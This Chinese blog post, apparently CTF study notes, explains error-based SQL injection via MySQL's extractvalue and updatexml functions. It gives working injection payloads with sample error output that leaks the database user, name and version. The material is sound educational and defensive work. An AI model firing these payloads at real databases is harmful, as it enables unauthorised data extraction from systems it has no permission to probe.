Akiba's blog Akiba's blog
首页
  • web

    • PHP
    • Python
    • JavaScript
  • misc

    • 隐写
  • 比赛
  • 网站
  • 资源
  • 分类
  • 标签
  • 归档
关于

Kagami

萌新 Web 手,菜鸡一个
首页
  • web

    • PHP
    • Python
    • JavaScript
  • misc

    • 隐写
  • 比赛
  • 网站
  • 资源
  • 分类
  • 标签
  • 归档
关于
  • Web

    • 各种弹shell
    • XML外部实体注入从入门到入土
    • PHP

    • JavaScript

    • Python

    • sql注入

      • 报错注入
        • extractvalue
        • updatexml
        • 参考
  • Misc

  • JavaScript文章

  • Vue文章

  • 代码审计

  • 知识库
  • Web
  • sql注入
Kagami
2021-07-29

报错注入

# extractvalue

extractvalue: 从目标XML中返回包含所查询值的字符串。
EXTRACTVALUE (XML_document, XPath_string);

XML_document: String 为XML文档对象的名称,文中为Doc
XPath_string Xpath格式的字符串
concat: 返回结果为连接参数产生的字符串。

payload

用户名
1' and (extractvalue(1,concat(0x7e,user(),0x7e)));#
error 1105 : XPATH syntax error: '~root@localhost~'

数据库
1' and (extractvalue(1,concat(0x7e,database(),0x7e)));#
error 1105 : XPATH syntax error: '~supersqli~'

版本
1' and (extractvalue(1,concat(0x7e,version(),0x7e)));#
error 1105 : XPATH syntax error: '~10.3.15-MariaDB~'
1
2
3
4
5
6
7
8
9
10
11

# updatexml

高版本的mysql已经修复了该bug

updatexml

UPDATEXML (XML_document, XPath_string, new_value);

XML_document: String 为XML文档对象的名称,文中为Doc
XPath_string: String (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
new_value: String 替换查找到的符合条件的数据

payload

1' and (updatexml(1,concat(0x7e,(select database())),1))
1

# 参考

sql报错注入:extractvalue、updatexml报错原理 (opens new window)

上次更新: 2021/07/29, 20:28:59
Flask渗透01:debug模式中的RCE
ntfs流隐写

← Flask渗透01:debug模式中的RCE ntfs流隐写→

Theme by Vdoing | Copyright © 2020-2021 秋葉
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式